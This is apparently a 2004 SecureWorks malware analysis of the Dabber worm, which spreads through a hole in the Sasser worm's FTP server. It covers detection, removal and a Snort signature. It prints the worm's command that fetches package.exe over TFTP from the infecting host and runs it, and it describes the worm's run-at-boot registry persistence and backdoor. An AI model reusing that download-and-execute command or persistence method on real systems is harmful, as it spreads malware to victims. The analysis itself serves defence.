Dabber Worm Analysis

• URL: http://www.secureworks.com/research/threats/dabber
• Date: May 13, 2004
• Author: Joe Stewart

SecureWorks' research team has discovered a new worm exploiting a vulnerability in the FTP server component of the Sasser worm. This worm will only infect users already infected by Sasser. Even though we have seen worms utilize backdoors left behind by other worms, this is the first time we have seen a worm using a vulnerability in another worm in order to propagate. We have named this worm "Dabber".

Update: May 14, 2004

Third party analysis has indicated that Dabber is related to the Doomran worm discovered in March. Doomran had a similar method of operation, infecting hosts through the backdoor left by the Mydoom email virus, however it merely utilized the Mydoom backdoor protocol instead of exploiting a vulnerability. It is likely that much of the worm code was reused by the author to create Dabber, substituting the Sasser-FTP exploit for the Mydoom backdoor upload code and adding the ability to remove Sasser.

Correlations between scans on port 3127 (Mydoom backdoor) and port 9898 (Dabber/Doomran backdoor) were made as early as February, but due to no complete analyses of Doomran being available, the connection between the port 9898 activity and Doomran was not established until now.

File Details

Name: package.exe
Size: 29,696 bytes
MD5: 149dd119425ec801fbca6237413db631
PE compile time: Wed May 12 00:46:01 2004

The worm incorporates code from the Sasser-FTP exploit recently released by "mandragore" of the Romanian Security Research team. The worm scans for Sasser-infected hosts on port 5554. When it finds one, it uses the exploit to temporarily bind a Windows command shell to port 8967. The worm then connects to the victim host on that port and issues the following command:

tftp -i [infecting host ip] GET hello.all package.exe & package.exe & exit

The worm has a TFTP server built-in to transfer the executable file of the worm to the target system. When the command above runs, a file "package.exe" will be copied to the victim system and executed.

When executed, the worm takes the following steps:

• Copies itself to Startup folders and the Windows system directory.
• Creates a mutex named "sas4dab" to ensure only one worm process runs in memory.
• Installs a registry key to run at boot:

  In SOFTWARE\Microsoft\Windows\CurrentVersion\Run:

  	sassfix -> %WINDIR%\package.exe

• Deletes a list of registry keys of Sasser and other viruses:

  From SOFTWARE\Microsoft\Windows\CurrentVersion\Run:

  CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32
  Gremlin
  Taskmon
  Video
  avserve
  avvserrve32
  avserve2.exe
  lsasss.exe
  lsasss
  ssgrate.exe
  ssgrate
  drvsys.exe
  drvsys
  drvsys
  Drvddll_exe
  Drvddll_exe
  Drvddll.exe
  Drvddll.exe
  Microsoft Update
  windows
  Windows Drive Compatibility
  Generic Host Service
  skynetave.exe
  navapsrc.exe
  lsasss.exe
  drvddll.exe
  ssgrate.exe
  WinMsrv32
  soundcontrl
  System Updater Service
  BagleAV
  MapiDrv
  SkynetRevenge
  TempCom
  Video Process
  Window
  Microsoft Update
  windows
  Windows Drive Compatibility
  Generic Host Service
  skynetave.exe
  navapsrc.exe
  lsasss.exe
  drvddll.exe
  ssgrate.exe
  WinMsrv32
  soundcontrl
  System Updater Service
  BagleAV
  MapiDrv
  SkynetRevenge
  TempCom
  Video Process
  Window
  Microsoft Update
  

  From SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices:

  windows
  Windows Drive Compatibility
  Generic Host Service
  skynetave.exe
  navapsrc.exe
  lsasss.exe
  drvddll.exe
  ssgrate.exe
  WinMsrv32
  soundcontrl
  System Updater Service
  BagleAV
  MapiDrv
  SkynetRevenge
  TempCom
  Video Process
  Window
  

• Sets up a TFTP server used to transfer the worm code to target systems
• Sets up a backdoor listener on TCP port 9898. An authenticated backdoor user can download additional code, execute processes on the infected system and get statistics about how many additional hosts have been infected by the local worm process.

From a network standpoint, the exploit process will look slightly different than interactive runs of the exploit code - the worm will connect to port 5554 and send a single byte (an ascii "C"). If that connection is successful, it will reconnect to port 5554 and send the exploit. After the exploit has been sent the worm will attempt to connect to port 9898 on the target host in order to confirm the infection was successful, again sending an ascii "C". If the connection to port 9898 is successful, an internal tally is incremented, presumably so statistics can be retrieved from the backdoor at a later time. Sequential scans on port 5554 and 9898 are an indicator of an infection.

Removal

Kill the package.exe process using the Windows Task Manager. Remove the "sassfix" registry key. Delete package.exe from the Windows system directory and all startup folders.

Snort Signatures

The following Snort signature can detect the exploit used by the worm:

alert tcp any any -> any 5554 (msg:"Sasser FTP exploit attempt"; flow:to_server,established; content:"PORT "; depth:5; dsize:>150; classtype:attempted-admin; reference:url,www.secureworks.com/research/threats/dabber; sid:1000105; rev:1;)